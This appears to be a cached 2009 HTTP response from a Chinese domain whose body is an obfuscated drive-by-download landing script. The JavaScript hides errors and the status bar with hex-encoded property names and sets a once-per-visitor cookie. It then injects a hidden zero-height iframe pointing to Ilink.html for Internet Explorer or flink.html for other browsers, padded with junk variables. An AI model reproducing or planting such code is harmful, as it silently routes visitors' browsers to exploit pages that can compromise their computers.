HTTP/1.1 200 OK
Content-Length: 899
ETag: "0b2ac355e97c91:645"
Date: Thu, 26 Feb 2009 05:36:01 GMT
Last-Modified: Wed, 25 Feb 2009 15:32:04 GMT
Content-Type: text/html
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Polipo-Location: http://www.sll9012.cn/a10/fx.htm
X-Polipo-Date: Thu, 26 Feb 2009 05:46:57 GMT
X-Polipo-Access: Thu, 26 Feb 2009 05:47:24 GMT

<script>
window["\x6f\x6e\x65\x72\x72\x6f\x72"]=function (){
	return true;
	
}
function init(){var kdslsd="asdcbn";
	window["\x73"+"\x74"+"\x61\x74"+"\x75\x73"]="";
	
}window["\x6f\x6e\x6c\x6f\x61\x64"]=init;
if(document.cookie.indexOf("play=")==-1)
{var ppppvvvv="gppp";var expires=new Date();var spnbv="fdsfds";
	expires.setTime(expires.getTime()+0*60*60*1000);	
	document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
	var rcaac="d";	
	if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
	{
		
		document.write("");	
		document.write("<IFrame src=Ilink.html width=100 height=0></iframe>");		
		document.write("");		
		
	}
	else {
		
		document.write("");	
		var sdcxcap="ds";	
		document.write("<iframe src=flink.html width=100 height=0></iframe>");var xcfcx="xc";
	}}
var ksp="nishiyizhizhu";var fkasacv="BS";var fkqcacv="BS";var qqccv="BS";
</script>